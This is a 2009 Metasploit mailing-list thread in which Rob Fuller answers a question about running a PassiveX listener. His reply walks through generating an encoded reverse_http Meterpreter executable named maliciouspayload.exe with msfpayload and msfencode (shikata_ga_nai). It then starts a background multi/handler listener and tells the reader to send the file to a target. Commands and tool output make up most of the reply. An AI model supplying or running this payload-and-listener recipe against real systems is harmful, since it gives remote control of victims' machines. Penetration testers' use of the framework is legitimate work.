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Fwd: PassiveX Listener

From: mubix at (Rob Fuller)
Date: Wed, 10 Jun 2009 09:32:01 -0400

Damn you people and your strict RFC compliance... ;-)

Rob Fuller | Mubix | |

---------- Forwarded message ----------
From: Rob Fuller <mubix at>
Date: Wed, Jun 10, 2009 at 9:11 AM
Subject: Re: [framework] PassiveX Listener
To: Jamie Penney <jamie.penney at>

*Here are the options for msfpayload:*

Usage: ./msfpayload <payload> [var=val]

*And msfencode's options if you chose to use it as I demonstrate below.
However, encoding happens by default with msfpayload (IIRC):*

./msfencode -h

    Usage: ./msfencode <options>


    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -c <opt>  The number of times to encode the data
    -e <opt>  The encoder to use
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -l        List available encoders
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The format to display the encoded buffer with (c, elf, exe,
java, perl, raw, ruby, vba)
 *Here we create the PassiveX payload. Note the PX options instead of the

./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST=
PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe
[*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)

*Now that we have our "malicious payload" in /tmp we get our listener ready
(you can use msfcli as well, I just like msfconsole because it provides me
more flexibility):*


                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/

       =[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 153 aux

msf > use multi/handler
msf exploit(handler) > exploit -h

*(I'm showing you 'exploit's options because a lot of people don't know they
exist. With two lines you can start your listener (use, then exploit):*

Usage: exploit [options]

Launches an exploitation attempt.


    -e <opt>  The payload encoder to use.  If none is specified, ENCODER is
    -h        Help banner.
    -j        Run in the context of a job.
    -n <opt>  The NOP generator to use.  If none is specified, NOP is used.
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The payload to use.  If none is specified, PAYLOAD is used.
    -t <opt>  The target index to use.  If none is specified, TARGET is
    -z        Do not interact with the session after successful

msf exploit(handler) > exploit -j -z -p
windows/reflectivemeterpreter/reverse_http -o
[*] Exploit running as background job.
msf exploit(handler) >
[*] PassiveX listener started.
[*] Starting the payload handler...

msf exploit(handler) >

*Listener ready to go. I chose IP: just to make things easy. Just
send off maliciouspayload.exe to your target and you're set.*

Hope this helps,

Rob Fuller | Mubix | |

On Wed, Jun 10, 2009 at 5:51 AM, Jamie Penney <jamie.penney at>wrote:

Does anyone know off the top of their head how run the PassiveX
listener without actually sending any exploit. For example, if I use
msfpayload piped to msfencode to create an .exe file containing the
PassiveX stage 1 code and run this manually I would need the listener
to be running on the other end.

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